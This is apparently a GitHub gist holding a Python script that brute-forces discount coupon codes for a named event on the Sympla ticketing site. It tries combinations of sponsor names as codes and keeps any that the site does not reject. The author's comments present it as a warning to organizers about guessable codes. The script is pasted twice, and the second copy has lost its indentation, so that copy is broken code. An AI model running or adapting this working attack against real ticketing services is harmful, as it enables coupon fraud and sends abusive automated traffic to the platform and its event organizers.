endersonmenezes/bruteforce.py

## bruteforce.py
#  Copyright (c) 2018. Enderson Menezes Cândido [www.endersonmenezes.com.br]
#  Your console will display a list of available discount coupons.
#  Do not use this code to gain advantage or illegally enter the event.
#  Code just to demonstrate that creating discount coupons in sympla using simple word combinations can be hacked.
#  This gist serves to show how social engineering be taken care of by event organizations.
#  To event organizers please create discount coupon processes and tracking processes.
#  Working Since 2018

import requests
import itertools

# Enter EVENT link with ?d=
url = 'https://www.sympla.com.br/ticnova-2019__594324?d='

# Search for the current sponsors of the year, and enter the words here.
tentativasarray = ['TICNOVA', '2019', 'UNICESUMAR', 'SBM', 'CESUMAR', 'SOFTWAREBY', 'SOFTWAREBYMARINGA', 'ACCION',
                   'BUYSOFT', 'GETCARD', 'TECNOSPEED', 'ALUNO', 'BYTEABYTE', 'ACIM', 'SEBRAE']

tentativas_comb = itertools.product(tentativasarray, repeat=2)
tentativas_comb_3 = itertools.product(tentativasarray, repeat=3)
tentativas_comb_4 = itertools.product(tentativasarray, repeat=4)

pagina = requests.get(str(url) + 'TICNOVA2019SBM')
descontoinvalido = pagina.text.find('Codigo inválido')
cupons_funcionando = list()
tentativas_realizadas = 0
for tentativas in tentativas_comb:
    pagina = requests.get(str(url) + tentativas[0] + tentativas[1])
    descontoinvalido = pagina.text.find('Código inválido')
    if descontoinvalido == -1:
        cupons_funcionando.append(str(tentativas))
    tentativas_realizadas += 1
    print(tentativas_realizadas)
    print(cupons_funcionando)


for tentativas in tentativas_comb_3:
    pagina = requests.get(str(url) + tentativas[0] + tentativas[1] + tentativas[2])
    descontoinvalido = pagina.text.find('Código inválido')
    if descontoinvalido == -1:
        cupons_funcionando.append(str(tentativas))
    tentativas_realizadas += 1
    print(tentativas_realizadas)
    print(cupons_funcionando)


for tentativas in tentativas_comb_4:
    pagina = requests.get(str(url) + tentativas[0] + tentativas[1] + tentativas[2] + tentativas[3])
    descontoinvalido = pagina.text.find('Código inválido')
    if descontoinvalido == -1:
        cupons_funcionando.append(str(tentativas))
    tentativas_realizadas += 1
    print(tentativas_realizadas)
    print(cupons_funcionando)
	# Copyright (c) 2018. Enderson Menezes Cândido [www.endersonmenezes.com.br]
	# Your console will display a list of available discount coupons.
	# Do not use this code to gain advantage or illegally enter the event.
	# Code just to demonstrate that creating discount coupons in sympla using simple word combinations can be hacked.
	# This gist serves to show how social engineering be taken care of by event organizations.
	# To event organizers please create discount coupon processes and tracking processes.
	# Working Since 2018

	import requests
	import itertools

	# Enter EVENT link with ?d=
	url = 'https://www.sympla.com.br/ticnova-2019__594324?d='

	# Search for the current sponsors of the year, and enter the words here.
	tentativasarray = ['TICNOVA', '2019', 'UNICESUMAR', 'SBM', 'CESUMAR', 'SOFTWAREBY', 'SOFTWAREBYMARINGA', 'ACCION',
	'BUYSOFT', 'GETCARD', 'TECNOSPEED', 'ALUNO', 'BYTEABYTE', 'ACIM', 'SEBRAE']

	tentativas_comb = itertools.product(tentativasarray, repeat=2)
	tentativas_comb_3 = itertools.product(tentativasarray, repeat=3)
	tentativas_comb_4 = itertools.product(tentativasarray, repeat=4)

	pagina = requests.get(str(url) + 'TICNOVA2019SBM')
	descontoinvalido = pagina.text.find('Codigo inválido')
	cupons_funcionando = list()
	tentativas_realizadas = 0
	for tentativas in tentativas_comb:
	pagina = requests.get(str(url) + tentativas[0] + tentativas[1])
	descontoinvalido = pagina.text.find('Código inválido')
	if descontoinvalido == -1:
	cupons_funcionando.append(str(tentativas))
	tentativas_realizadas += 1
	print(tentativas_realizadas)
	print(cupons_funcionando)


	for tentativas in tentativas_comb_3:
	pagina = requests.get(str(url) + tentativas[0] + tentativas[1] + tentativas[2])
	descontoinvalido = pagina.text.find('Código inválido')
	if descontoinvalido == -1:
	cupons_funcionando.append(str(tentativas))
	tentativas_realizadas += 1
	print(tentativas_realizadas)
	print(cupons_funcionando)


	for tentativas in tentativas_comb_4:
	pagina = requests.get(str(url) + tentativas[0] + tentativas[1] + tentativas[2] + tentativas[3])
	descontoinvalido = pagina.text.find('Código inválido')
	if descontoinvalido == -1:
	cupons_funcionando.append(str(tentativas))
	tentativas_realizadas += 1
	print(tentativas_realizadas)
	print(cupons_funcionando)